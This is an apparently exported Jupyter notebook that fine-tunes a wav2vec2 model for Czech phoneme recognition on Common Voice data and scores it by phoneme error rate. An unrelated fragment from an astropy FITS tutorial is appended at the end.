# + id="RK0f5qB2WylF" executionInfo={"status": "ok", "timestamp": 1616608750181, "user_tz": -60, "elapsed": 7076, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}}
# Import libraries
from datasets import load_dataset, load_metric, ClassLabel, load_from_disk
import datasets
datasets.set_caching_enabled(False)
import torchaudio
import librosa
import torch
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Union
from transformers import Wav2Vec2CTCTokenizer, Wav2Vec2FeatureExtractor, Wav2Vec2Processor, Wav2Vec2ForCTC
from transformers import TrainingArguments, Trainer, AdamW, get_linear_schedule_with_warmup, get_polynomial_decay_schedule_with_warmup
from transformers import set_seed
from transformers import trainer_pt_utils
from transformers.trainer_pt_utils import DistributedTensorGatherer
from transformers.trainer_utils import EvalPrediction, denumpify_detensorize, PredictionOutput
from torch.utils.data.dataloader import DataLoader
from torch.optim.lr_scheduler import ReduceLROnPlateau
import random
import math
import pandas as pd
import numpy as np
from IPython.display import display, HTML
import re
import json
import os
from tqdm.notebook import tqdm
# phonemizer
#from phonemizer import phonemize
# + [markdown] id="5ipHCrkV2LHc"
# # Utils
# + id="gMRMKmC02Kib" executionInfo={"status": "ok", "timestamp": 1616608750468, "user_tz": -60, "elapsed": 5153, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}}
# text to phoneme
def text2phoneme(batch):
batch["sentence"] = phonemize(batch["sentence"], language='cs', backend="espeak")
return batch
# Visualisation
def show_random_elements(dataset, num_examples=10):
assert num_examples <= len(dataset), "Can't pick more elements than there are in the dataset."
picks = []
for _ in range(num_examples):
pick = random.randint(0, len(dataset)-1)
while pick in picks:
pick = random.randint(0, len(dataset)-1)
picks.append(pick)
df = pd.DataFrame(dataset[picks])
display(HTML(df.to_html()))
# Metrics PER
def NeedlemanWunschAlignScore(seq1, seq2, d, m, r, normalize=True):
N1, N2 = len(seq1), len(seq2)
# Fill up the errors
tmpRes_ = [[None for x in range(N2 + 1)] for y in range(N1 + 1)]
for i in range(N1 + 1):
tmpRes_[i][0] = i * d
for j in range(N2 + 1):
tmpRes_[0][j] = j * d
for i in range(N1):
for j in range(N2):
match = r if seq1[i] == seq2[j] else m
v1 = tmpRes_[i][j] + match
v2 = tmpRes_[i + 1][j] + d
v3 = tmpRes_[i][j + 1] + d
tmpRes_[i + 1][j + 1] = max(v1, max(v2, v3))
i = j = 0
res = -tmpRes_[N1][N2]
if normalize:
res /= float(N1)
return res
def get_seq_PER(seqLabels, detectedLabels):
return NeedlemanWunschAlignScore(seqLabels, detectedLabels, -1, -1, 0,
normalize=True)
def generate_per_score(refs, hyps):
score = 0.0
for ref, hyp in zip(refs, hyps):
score += get_seq_PER(ref.replace('[UNK]', ''), hyp.replace('[UNK]', ''))
return score/len(refs)
# Preprocessing
chars_to_ignore_regex = '[\,\?\.\!\-\;\:\"\“\%\‘\”\�\—\…\–\«\»]'
def remove_special_characters(batch):
batch["text"] = re.sub(chars_to_ignore_regex, '', batch["sentence"]).lower() + " "
batch["text"] = batch["text"].replace('`', '’')
return batch
# Vocabulary
def extract_all_chars(batch):
all_text = " ".join(batch["text"])
vocab = list(set(all_text))
return {"vocab": [vocab], "all_text": [all_text]}
# Audio file
def speech_file_to_array_fn(batch):
speech_array, sampling_rate = torchaudio.load(batch["path"])
batch["speech"] = speech_array[0].numpy()
batch["sampling_rate"] = sampling_rate
batch["target_text"] = batch["text"]
return batch
def resample(batch):
batch["speech"] = librosa.resample(np.asarray(batch["speech"]), 48_000, 16_000)
batch["sampling_rate"] = 16_000
return batch
# Preparing dataset for training
def prepare_dataset(batch):
# check that all files have the correct sampling rate
assert (
len(set(batch["sampling_rate"])) == 1
), f"Make sure all inputs have the same sampling rate of {processor.feature_extractor.sampling_rate}."
batch["input_values"] = processor(batch["speech"], sampling_rate=batch["sampling_rate"][0]).input_values
with processor.as_target_processor():
batch["labels"] = processor(batch["target_text"]).input_ids
return batch
# Special Data Collator
@dataclass
class DataCollatorCTCWithPadding:
"""
Data collator that will dynamically pad the inputs received.
Args:
processor (:class:`~transformers.Wav2Vec2Processor`)
The processor used for proccessing the data.
padding (:obj:`bool`, :obj:`str` or :class:`~transformers.tokenization_utils_base.PaddingStrategy`, `optional`, defaults to :obj:`True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
* :obj:`True` or :obj:`'longest'`: Pad to the longest sequence in the batch (or no padding if only a single
sequence if provided).
* :obj:`'max_length'`: Pad to a maximum length specified with the argument :obj:`max_length` or to the
maximum acceptable input length for the model if that argument is not provided.
* :obj:`False` or :obj:`'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of
different lengths).
max_length (:obj:`int`, `optional`):
Maximum length of the ``input_values`` of the returned list and optionally padding length (see above).
max_length_labels (:obj:`int`, `optional`):
Maximum length of the ``labels`` returned list and optionally padding length (see above).
pad_to_multiple_of (:obj:`int`, `optional`):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
"""
processor: Wav2Vec2Processor
padding: Union[bool, str] = True
max_length: Optional[int] = None
max_length_labels: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
pad_to_multiple_of_labels: Optional[int] = None
def __call__(self, features: List[Dict[str, Union[List[int], torch.Tensor]]]) -> Dict[str, torch.Tensor]:
# split inputs and labels since they have to be of different lenghts and need
# different padding methods
input_features = [{"input_values": feature["input_values"]} for feature in features]
label_features = [{"input_ids": feature["labels"]} for feature in features]
batch = self.processor.pad(
input_features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
return_tensors="pt",
)
with self.processor.as_target_processor():
labels_batch = self.processor.pad(
label_features,
padding=self.padding,
max_length=self.max_length_labels,
pad_to_multiple_of=self.pad_to_multiple_of_labels,
return_tensors="pt",
)
# replace padding with -100 to ignore loss correctly
labels = labels_batch["input_ids"].masked_fill(labels_batch.attention_mask.ne(1), -100)
batch["labels"] = labels
return batch
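# The -100 masking step in the collator can be sketched with NumPy on toy label ids (torch's masked_fill does the same thing on tensors): pad positions -- where the attention mask is 0 -- are replaced so the CTC loss ignores them.

```python
import numpy as np

padded_labels = np.array([[5, 2, 7], [3, 1, 0]])    # 0 = hypothetical pad id
attention_mask = np.array([[1, 1, 1], [1, 1, 0]])

masked = np.where(attention_mask == 1, padded_labels, -100)
print(masked.tolist())   # [[5, 2, 7], [3, 1, -100]]
```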
# Metric
def compute_metrics(pred):
pred_logits = pred.predictions
pred_ids = np.argmax(pred_logits, axis=-1)
pred.label_ids[pred.label_ids == -100] = processor.tokenizer.pad_token_id
pred_str = processor.batch_decode(pred_ids)
# we do not want to group tokens when computing the metrics
label_str = processor.batch_decode(pred.label_ids, group_tokens=False)
wer = wer_metric.compute(predictions=pred_str, references=label_str)
return {"wer": wer}
# Input preparation
def prepare_inputs(inputs):
for k, v in inputs.items():
if isinstance(v, torch.Tensor):
inputs[k] = v.cuda()
return inputs
# Loss computation
def compute_loss(model, inputs, return_outputs=False):
outputs = model(**inputs)
loss = outputs["loss"] if isinstance(outputs, dict) else outputs[0]
return (loss, outputs) if return_outputs else loss
# Prediction Loop
def prediction_loop(data_loader, model, world_size):
num_examples = len(data_loader.dataset)
batch_size = data_loader.batch_size
eval_losses_gatherer = DistributedTensorGatherer(world_size, num_examples,
make_multiple_of=batch_size)
preds_gatherer = DistributedTensorGatherer(world_size, num_examples)
labels_gatherer = DistributedTensorGatherer(world_size, num_examples)
losses_host, preds_host, labels_host = None, None, None
model.eval()
for step, inputs in enumerate(data_loader):
loss, logits, labels = prediction_step(model, inputs)
losses = loss.repeat(batch_size)
losses_host = losses if losses_host is None else torch.cat((losses_host, losses), dim=0)
preds_host = logits if preds_host is None else nested_concat(preds_host, logits, padding_index=-100)
labels_host = labels if labels_host is None else nested_concat(labels_host, labels, padding_index=-100)
eval_losses_gatherer.add_arrays(trainer_pt_utils.nested_numpify(losses_host))
preds_gatherer.add_arrays(trainer_pt_utils.nested_numpify(preds_host))
labels_gatherer.add_arrays(trainer_pt_utils.nested_numpify(labels_host))
losses_host, preds_host, labels_host = None, None, None
eval_loss = eval_losses_gatherer.finalize()
preds = preds_gatherer.finalize()
labels_ids = labels_gatherer.finalize()
preds_ids = np.argmax(preds, axis=-1)
predicted_phonemes = processor.batch_decode(torch.from_numpy(preds_ids))
true_phonemes = processor.batch_decode(torch.from_numpy(labels_ids))
return generate_per_score(true_phonemes, predicted_phonemes)
# Prediction Single Batch
def prediction_step(model, inputs, label_names=["labels"]):
has_labels = all(inputs.get(k) is not None for k in label_names)
inputs = prepare_inputs(inputs)
if hasattr(model, "config"):
ignore_keys = getattr(model.config, "keys_to_ignore_at_inference", [])
else:
ignore_keys = []
if has_labels:
labels = trainer_pt_utils.nested_detach(tuple(inputs.get(name) for name in label_names))
if len(labels) == 1:
labels = labels[0]
else:
labels = None
with torch.no_grad():
if has_labels:
loss, outputs = compute_loss(model, inputs, True)
loss = loss.mean().detach()
if isinstance(outputs, dict):
logits = tuple(v for k, v in outputs.items() if k not in ignore_keys + ["loss"])
else:
logits = outputs[1:]
else:
loss, outputs = None, model(**inputs)
if isinstance(outputs, dict):
logits = tuple(v for k, v in outputs.items() if k not in ignore_keys + ["loss"])
else:
logits = outputs
logits = trainer_pt_utils.nested_detach(logits)
if len(logits) == 1:
logits = logits[0]
return (loss, logits, labels)
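# A compact, self-contained version of the NeedlemanWunschAlignScore / get_seq_PER pair above (same scoring: gap -1, mismatch -1, match 0; normalized by the reference length), handy for sanity-checking the metric on short strings:

```python
def align_score(ref, hyp, d=-1, m=-1, r=0):
    """Normalized alignment cost: 0.0 for identical strings."""
    n1, n2 = len(ref), len(hyp)
    dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]
    for i in range(n1 + 1):
        dp[i][0] = i * d
    for j in range(n2 + 1):
        dp[0][j] = j * d
    for i in range(n1):
        for j in range(n2):
            match = r if ref[i] == hyp[j] else m
            dp[i + 1][j + 1] = max(dp[i][j] + match,
                                   dp[i + 1][j] + d,
                                   dp[i][j + 1] + d)
    return -dp[n1][n2] / n1

print(align_score("kot", "kot"))   # 0.0
print(align_score("kot", "kit"))   # one substitution -> ~0.333
```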
# + [markdown] id="ami3ewqkUaD_"
# # Czech Dataset
# If you don't already have the preprocessed dataset, continue; otherwise, skip this section.
# + [markdown] id="prxikwRLNuGb"
# We are going to download the Czech dataset \
# **Note**: Most likely, the common voice link has expired. In this case, just go to [Common Voice's dataset website](https://commonvoice.mozilla.org/en/datasets), select your language, *e.g.* `Czech`, enter your email address to get the "*Download*" button, right-click it, and click `Copy link address` to fill it in the cell below.
# + colab={"base_uri": "https://localhost:8080/"} id="ILk9Yhi0OgvS" executionInfo={"elapsed": 2239, "status": "ok", "timestamp": 1616490079984, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="977b6bf2-dc07-4d1d-bd6d-f2debc8ae3af"
common_voice = load_dataset("common_voice", "cs", data_dir="./cv-corpus-6.1-2020-12-11", split="train+validation")
common_voice_test = load_dataset("common_voice", "cs", data_dir="./cv-corpus-6.1-2020-12-11", split="test")
# + id="SZJPv7tBPBTo"
common_voice = common_voice.remove_columns(["accent", "age", "client_id", "down_votes", "gender", "locale", "segment", "up_votes"])
common_voice_test = common_voice_test.remove_columns(["accent", "age", "client_id", "down_votes", "gender", "locale", "segment", "up_votes"])
# + [markdown] id="GHIkAICG14lg"
# ## Preprocess
# + colab={"base_uri": "https://localhost:8080/", "height": 979} id="qnYPgxtU14GO" executionInfo={"elapsed": 576, "status": "ok", "timestamp": 1616489134922, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="3219b3ab-1002-4fe9-c596-709f1d1c26ca"
show_random_elements(common_voice.remove_columns(['path']), num_examples=30)
# + [markdown] id="VFj3gHW33RGD"
# We are going to preprocess the text and remove some special symbols (`,.?!;`), as we don't have any language model at the output
# + id="tUFCciNKR8YG"
common_voice = common_voice.map(text2phoneme, num_proc=4)
common_voice_test = common_voice_test.map(text2phoneme, num_proc=4)
# + colab={"base_uri": "https://localhost:8080/", "height": 979} id="UrjmzIbZSdO-" executionInfo={"elapsed": 551, "status": "ok", "timestamp": 1616489685993, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="1a14f205-cb68-40d2-c1b3-46a3c4941272"
show_random_elements(common_voice.remove_columns(['path']), num_examples=30)
# + id="qavL52PA4Y21"
# common_voice = common_voice.map(remove_special_characters, remove_columns=["sentence"])
# common_voice_test = common_voice_test.map(remove_special_characters, remove_columns=["sentence"])
# + [markdown] id="fNUbpCJV4zkf"
# Let's now see what the sentences look like
# + id="nq-lzngY421w"
# show_random_elements(common_voice.remove_columns(["path"]))
# + [markdown] id="5mxfaO3p4_mp"
# ## Building Vocabulary
# + [markdown] id="d7GXUJ3S5BUT"
# As we are going to use CTC as the top layer, we will classify speech chunks into letters, so we now extract all distinct letters and build our vocabulary from them.
# + id="R7gawagYWQF_"
common_voice = common_voice.rename_column("sentence", "text")
common_voice_test = common_voice_test.rename_column("sentence", "text")
# + id="2kgxTh1U5VNL"
vocab_train = common_voice.map(extract_all_chars, batched=True, batch_size=-1, keep_in_memory=True, remove_columns=common_voice.column_names)
vocab_test = common_voice_test.map(extract_all_chars, batched=True, batch_size=-1, keep_in_memory=True, remove_columns=common_voice_test.column_names)
# + [markdown] id="5YNn85Yi5i1r"
# Now we will create the union of all distinct letters from both datasets, just as we would for a translation / generation task.
# + colab={"base_uri": "https://localhost:8080/"} id="Z2CwjQQv5uho" executionInfo={"elapsed": 919, "status": "ok", "timestamp": 1616490586996, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="707db7d4-5731-4d8e-fde1-9139c891da83"
vocab_list = list(set(vocab_train["vocab"][0]) | set(vocab_test["vocab"][0]))
vocab_dict = {v: k for k, v in enumerate(vocab_list)}
vocab_dict
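# A toy version of the union above (hypothetical strings, not the real corpus): distinct characters from two splits are merged and mapped to integer ids.

```python
train_chars = set("abc a")
test_chars = set("bcd")

toy_vocab = {c: i for i, c in enumerate(sorted(train_chars | test_chars))}
print(toy_vocab)   # {' ': 0, 'a': 1, 'b': 2, 'c': 3, 'd': 4}
```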
# + colab={"base_uri": "https://localhost:8080/"} id="0FdMWUD4HOvy" executionInfo={"elapsed": 911, "status": "ok", "timestamp": 1616490586996, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="2f897b96-3240-4175-990b-09e5fb96c8dd"
# Adding the word delimiter token, the unknown token and the padding token
vocab_dict["|"] = vocab_dict[" "]
del vocab_dict[" "]
vocab_dict["[UNK]"] = len(vocab_dict)
vocab_dict["[PAD]"] = len(vocab_dict)
print(f"Our final layer will have as output dimension {len(vocab_dict)}")
# + id="8Z0wt0YQHnDC"
# Now let's save our dictionary
parent_dir = ['/content/drive/MyDrive/speech_w2v', '/content/drive/MyDrive/3A/MVA/Speech & NLP/speech_w2v']
i = 0
with open(os.path.join(parent_dir[i], 'czeck_phonem_vocab.json'), 'w') as vocab_file:
json.dump(vocab_dict, vocab_file)
# + [markdown] id="pXTLSrSXI5oH"
# ## XLSR Wav2Vec 2.0 Features Extractor
# + id="PDvLUjQ6JoMw"
# Now we are going to open and store the audio file (represented as a numpy array)
common_voice = common_voice.map(speech_file_to_array_fn, remove_columns=common_voice.column_names)
common_voice_test = common_voice_test.map(speech_file_to_array_fn, remove_columns=common_voice_test.column_names)
# + id="QeJR0xmGI_uo"
# First we have to downsample the original audio from 48 kHz to 16 kHz
common_voice = common_voice.map(resample, num_proc=4)
common_voice_test = common_voice_test.map(resample, num_proc=4)
# + id="xFnGfLnrQDyN"
# common_voice.save_to_disk('/content/drive/MyDrive/speech_w2v/train_ukrainian_preprocessed.files')
# common_voice_test.save_to_disk('/content/drive/MyDrive/speech_w2v/test_ukrainian_preprocessed.files')
# + [markdown] id="JjTetH_U6xqm"
# # Load locally if the preprocessed files have already been saved
# + [markdown] id="6sYvc6m7gnrr"
# # Split into 10 min, 1 h, and 8 h subsets
# + id="qTNcGxVQ5gEz"
# Loading tokenizer
tokenizer = Wav2Vec2CTCTokenizer(os.path.join(parent_dir[i], 'czeck_phonem_vocab.json'), unk_token="[UNK]", pad_token="[PAD]", word_delimiter_token="|")
# Load Feature Extractor
feature_extractor = Wav2Vec2FeatureExtractor(feature_size=1, sampling_rate=16000, padding_value=0.0, do_normalize=True, return_attention_mask=True)
# Wrap the feature_extractor and the tokenizer into one class (thanks so much HuggingFace)
processor = Wav2Vec2Processor(feature_extractor=feature_extractor, tokenizer=tokenizer)
# + id="KhqVRMLQFPTl"
# Split into train/dev
np.random.seed(42)
data = common_voice.train_test_split(test_size=0.2, seed=42)
common_voice_train, common_voice_validation = data['train'], data['test']
# + id="fcExOxBNf1PB"
# Now let's shuffle the data
common_voice_train = common_voice_train.shuffle(seed=42)
# + colab={"base_uri": "https://localhost:8080/", "height": 66, "referenced_widgets": ["6a865b18b5f24222ab175d17ea30cb89", "<KEY>", "<KEY>", "39f1354be8f74417bc2a18570921ab20", "850ee67edfaa4ff983a7d81718219fff", "3210aed1125d4feb846f88c6021ff3ce", "<KEY>", "112822ddb9c642e89c97ec5db757463c"]} id="gAXOZJNKedmh" executionInfo={"elapsed": 498869, "status": "ok", "timestamp": 1616493202571, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="cb36fc7a-7f17-43ca-9941-dd6398ca34ac"
total_len_seconds = 0
indices_10mn = []
indices_1h = []
indices_8h = []
for i in tqdm(range(len(common_voice_train))):
speech_array, sampling_rate = common_voice_train[i]["speech"], common_voice_train[i]["sampling_rate"]
duration_audio = len(speech_array) * (1/sampling_rate)
if total_len_seconds <= 600:
indices_10mn.append(i)
if total_len_seconds <= 3600:
indices_1h.append(i)
if total_len_seconds <= 36000:
indices_8h.append(i)
total_len_seconds += duration_audio
if total_len_seconds > 36000:
break
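# The selection above is just a cumulative-duration cutoff. The same logic can be checked standalone with toy clip lengths (pure Python, no datasets dependency). Note that, exactly as in the loop above, the clip that crosses a budget is still included, because the check happens before its duration is added:

```python
def bucket_by_duration(durations_s, budgets_s=(600, 3600, 36000)):
    """Return, for each budget, the indices selected while the running
    total duration is still within that budget (mirrors the loop above)."""
    buckets = [[] for _ in budgets_s]
    total = 0.0
    for i, dur in enumerate(durations_s):
        for b, budget in enumerate(budgets_s):
            if total <= budget:
                buckets[b].append(i)
        total += dur
        if total > max(budgets_s):
            break
    return buckets

# Three clips of 400 s each: the first two fit the 10-minute (600 s) budget.
ten_mn, one_h, eight_h = bucket_by_duration([400.0, 400.0, 400.0])
print(ten_mn, one_h, eight_h)  # [0, 1] [0, 1, 2] [0, 1, 2]
```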
# + id="p8HbeUcrk9Ih"
common_voice_train_10mn = common_voice_train.select(indices_10mn)
common_voice_train_1h = common_voice_train.select(indices_1h)
common_voice_train_9h = common_voice_train.select(indices_8h)
# + id="r_s1mKyrRkFd"
common_voice_train_10mn = common_voice_train_10mn.map(prepare_dataset, remove_columns=common_voice_train_10mn.column_names, batch_size=8, num_proc=4, batched=True)
common_voice_train_1h = common_voice_train_1h.map(prepare_dataset, remove_columns=common_voice_train_1h.column_names, batch_size=8, num_proc=4, batched=True)
common_voice_train_9h = common_voice_train_9h.map(prepare_dataset, remove_columns=common_voice_train_9h.column_names, batch_size=8, num_proc=4, batched=True)
common_voice_validation = common_voice_validation.map(prepare_dataset, remove_columns=common_voice_validation.column_names, batch_size=8, num_proc=4, batched=True)
common_voice_test = common_voice_test.map(prepare_dataset, remove_columns=common_voice_test.column_names, batch_size=8, num_proc=4, batched=True)
# + id="EThqyYL-6sZu"
common_voice_train_10mn.save_to_disk('/content/drive/MyDrive/speech_w2v/train_czeck_phonem_10mn.files')
common_voice_train_1h.save_to_disk('/content/drive/MyDrive/speech_w2v/train_czeck_phonem_1h.files')
common_voice_train_9h.save_to_disk('/content/drive/MyDrive/speech_w2v/train_czeck_phonem_9h.files')
common_voice_validation.save_to_disk('/content/drive/MyDrive/speech_w2v/validation_czeck_phonem.files')
common_voice_test.save_to_disk('/content/drive/MyDrive/speech_w2v/test_czeck_phonem.files')
# + [markdown] id="FYc-hol0RiDk"
# # Training
# + id="bLZPYC1O7Ooo" executionInfo={"status": "ok", "timestamp": 1616608808425, "user_tz": -60, "elapsed": 59097, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}}
#common_voice_train_10mn = load_from_disk('/content/drive/MyDrive/speech_w2v/train_czeck_phonem_10mn.files')
common_voice_train_1h = load_from_disk('/content/drive/MyDrive/speech_w2v/train_czeck_phonem_1h.files')
#common_voice_train_9h = load_from_disk('/content/drive/MyDrive/speech_w2v/train_czeck_phonem_9h.files')
common_voice_validation = load_from_disk('/content/drive/MyDrive/speech_w2v/validation_czeck_phonem.files')
common_voice_test = load_from_disk('/content/drive/MyDrive/speech_w2v/test_czeck_phonem.files')
# + id="YcU0OqWiCITf" executionInfo={"status": "ok", "timestamp": 1616608808427, "user_tz": -60, "elapsed": 58176, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}}
parent_dir = ['/content/drive/MyDrive/speech_w2v', '/content/drive/MyDrive/3A/MVA/Speech & NLP/speech_w2v']
i = 0
# Loading tokenizer
tokenizer = Wav2Vec2CTCTokenizer(os.path.join(parent_dir[i], 'czeck_phonem_vocab.json'), unk_token="[UNK]", pad_token="[PAD]", word_delimiter_token="|")
# Load Feature Extractor
feature_extractor = Wav2Vec2FeatureExtractor(feature_size=1, sampling_rate=16000, padding_value=0.0, do_normalize=True, return_attention_mask=True)
# Wrap the feature_extractor and the tokenizer into one class (thanks so much HuggingFace)
processor = Wav2Vec2Processor(feature_extractor=feature_extractor, tokenizer=tokenizer)
# + id="bePRrNGpbxVs" colab={"base_uri": "https://localhost:8080/", "height": 66, "referenced_widgets": ["31d728f30aca4394be54a59232dd0f38", "1a7c9341837046d0ba8b08d5989046c6", "8f2d2f2cc7234a8d807c8534d98fabee", "5442cdcd2c0249c98f2fdf8c9f9c455d", "bb87805e219b445fb9a1c503008d219d", "8d9ed6bf62d54c2fa5ad2ce1ece5e75d", "1829d1d0be69450ea90dfeb6d7e39d88", "6f39d214b6464b30bd804278a7c23739"]} executionInfo={"status": "ok", "timestamp": 1616608809485, "user_tz": -60, "elapsed": 58129, "user": {"displayName": "Omar US", "photoUrl": "", "userId": "02556879631367095259"}} outputId="f444f9a0-80c9-4e83-a07f-137f371af497"
# Prepare our data collator
data_collator = DataCollatorCTCWithPadding(processor=processor, padding=True)
# Prepare our metric (wer_metric)
wer_metric = load_metric("wer")
# + [markdown] id="Diou-GNIbsJp"
# # 1h
# + [markdown] id="ADs7vPCeV84t"
# The first component of XLSR-Wav2Vec2 consists of a stack of CNN layers that extract acoustically meaningful - but contextually independent - features from the raw speech signal. This part of the model has already been sufficiently trained during pretraining and, as stated in the [paper](https://arxiv.org/pdf/2006.13979.pdf), does not need to be fine-tuned anymore.
# Thus, we can set the `requires_grad` to `False` for all parameters of the *feature extraction* part.
# + [markdown] id="Lhsh0PiCr8aH"
# In practice, I had to experiment with different values for dropout, SpecAugment's masking probability, layer dropout, and the learning rate until training was stable enough.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000, "referenced_widgets": ["0c4a5ddad2ca47fa96c630e9b7db909e", "4c3dd25966ac4bda9ab8cf8a2245fd64", "251dea592ddd4d498be0adddd479c3f9", "fd75aadebbec487a8e86fd0bcde3d8a9", "<KEY>", "7401aed895084085a00ed8908d421a4c", "a7fde143a991448e87ac4a34f0db619a", "3d30a590387f4ee9988c747a257cc0af", "<KEY>", "ea53de9fc5124e74a3ceff91f6472265", "2ae034f212874a4797c3cde23a412868", "<KEY>", "3234115ea2a64cbe85689ec2512203ce", "<KEY>", "780d6563f97345cca117d4add7c0df6d", "122381153629442ea980e8114b7d2c35"]} id="98jur6H-exB1" executionInfo={"status": "error", "timestamp": 1616621405417, "user_tz": -60, "elapsed": 12508750, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}} outputId="64750d07-a0ca-4be3-e85f-d1bf5ad5e7b0"
# Cell for training
# Set seed
set_seed(42)
# fname = '/content/wav2vec_small_960h.pt'
# checkpoint = torch.load(fname)
# args = checkpoint["args"]
# Load model
model = Wav2Vec2ForCTC.from_pretrained(
"facebook/wav2vec2-large-lv60",
# "facebook/wav2vec2-base-960h",
attention_dropout=0.1,
hidden_dropout=0.1,
feat_proj_dropout=0.0,
mask_time_prob=0.05,
layerdrop=0.1,
gradient_checkpointing=True,
ctc_loss_reduction="mean",
pad_token_id=processor.tokenizer.pad_token_id,
vocab_size=len(processor.tokenizer)
)
# Freeze the feature extractor
model.freeze_feature_extractor()
#for param in model.wav2vec2.feature_projection.parameters():
#param.requires_grad = False
#for param in model.wav2vec2.encoder.parameters():
#param.requires_grad = False
# Set to GPU
model.cuda()
# Get sampler
model_input_name = processor.feature_extractor.model_input_names[0]
sampler_train = trainer_pt_utils.LengthGroupedSampler(common_voice_train_1h, batch_size=16, model_input_name=model_input_name)
sampler_val = trainer_pt_utils.LengthGroupedSampler(common_voice_validation, batch_size=12, model_input_name=model_input_name)
# Get Loader
train_loader = DataLoader(common_voice_train_1h, batch_size=16, sampler=sampler_train, collate_fn=data_collator, num_workers=4)
valid_loader = DataLoader(common_voice_validation, batch_size=12, sampler=sampler_val, collate_fn=data_collator, num_workers=4)
#
learning_rate = 4e-4
n_epochs = 300
num_update_steps_per_epoch = len(train_loader)
max_steps = math.ceil(n_epochs * num_update_steps_per_epoch)
validation_freq = int(1*num_update_steps_per_epoch)
print_freq = int(1*num_update_steps_per_epoch)
scheduler_on_plateau_freq = int(num_update_steps_per_epoch)
# Optimizer
decay_parameters = trainer_pt_utils.get_parameter_names(model, [torch.nn.LayerNorm])
decay_parameters = [name for name in decay_parameters if "bias" not in name]
# NOTE: both groups below use weight_decay=0.0, so the decay/no-decay split
# currently has no effect; set a non-zero value in the first group to actually
# apply weight decay to the non-bias, non-LayerNorm parameters.
optimizer_grouped_parameters = [
    {
        "params": [p for n, p in model.named_parameters() if n in decay_parameters],
        "weight_decay": 0.0,
    },
    {
        "params": [p for n, p in model.named_parameters() if n not in decay_parameters],
        "weight_decay": 0.0,
    },
]
optimizer = AdamW(optimizer_grouped_parameters, lr=learning_rate)
# Scheduler
num_warmup_steps = int(20 * num_update_steps_per_epoch) # Necessary number of steps to go from 0.0 to lr
#warmup_scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps, max_steps)
warmup_scheduler = get_polynomial_decay_schedule_with_warmup(optimizer, num_warmup_steps, max_steps, lr_end=1e-7)
reduce_lr_plateau = None
## reduce_lr_plateau = ReduceLROnPlateau(optimizer, factor=0.6, patience=7) ## To define when warmup scheduler is finished
model.zero_grad()
current_total_steps = 0
current_best_wer = 2.0
for epoch in range(n_epochs):
print(f"EPOCH : {epoch}")
tr_loss = 0.0
epoch_step = 0
for step, inputs in enumerate(train_loader):
model.train()
inputs = prepare_inputs(inputs)
loss = compute_loss(model, inputs)
loss.backward()
tr_loss += loss.item()
if hasattr(optimizer, "clip_grad_norm"):
optimizer.clip_grad_norm(1.0)
elif hasattr(model, "clip_grad_norm_"):
model.clip_grad_norm_(1.0)
optimizer.step()
current_total_steps += 1
epoch_step += 1
#if current_total_steps < num_warmup_steps + 1:
#warmup_scheduler.step()
warmup_scheduler.step()
if current_total_steps % print_freq == 0:
print(f"Training Loss : {tr_loss/epoch_step}")
# Initialize the lronplateau as soon as we have finished the warmup
#if reduce_lr_plateau is None and current_total_steps > num_warmup_steps + 1:
#reduce_lr_plateau = ReduceLROnPlateau(optimizer, factor=0.7, patience=5, verbose=1)
model.zero_grad()
if current_total_steps % validation_freq == 0:
world_size = 1
per_score = prediction_loop(valid_loader, model, world_size)
eval_metric = per_score
print(f"ACTUAL PER : {eval_metric}")
if eval_metric < current_best_wer:
print("Hooray! New best wer validation. Saving model")
torch.save(model.state_dict(), os.path.join(parent_dir[i], 'w2v_czech_per_1h.pt'))
current_best_wer = eval_metric
#if reduce_lr_plateau is not None:
#reduce_lr_plateau.step(eval_metric)
# + [markdown] id="zYqZVrSpgaOn"
# # Score on the test set
# + id="h5waSufMl5It" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1616621656185, "user_tz": -60, "elapsed": 188614, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}} outputId="73e752a6-c926-45d4-acf2-c226db3aac93"
model.load_state_dict(torch.load(os.path.join(parent_dir[i], 'w2v_czech_per_1h.pt')))
world_size = 1
sampler_test = trainer_pt_utils.LengthGroupedSampler(common_voice_test, batch_size=32, model_input_name=model_input_name)
test_loader = DataLoader(common_voice_test, batch_size=32, sampler=sampler_test, collate_fn=data_collator, num_workers=4)
per_score = prediction_loop(test_loader, model, world_size)
print(f"The final PER score on the test set is {per_score}")
# + [markdown] id="rerVTFVnkQX9"
# PER_Val = 0.1375119203959974 / PER_Test = 0.17170498951345983
|
exp/czech_notebook_training/W2V_LV/w2v_1h_per_czech_experiment.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Reading and writing FITS files
#
# The [astropy.io.fits](http://docs.astropy.org/en/stable/io/fits/index.html) sub-package provides a way to read, write, and manipulate FITS files. It is one of the oldest packages in Astropy, and started out as the separate PyFITS package.
#
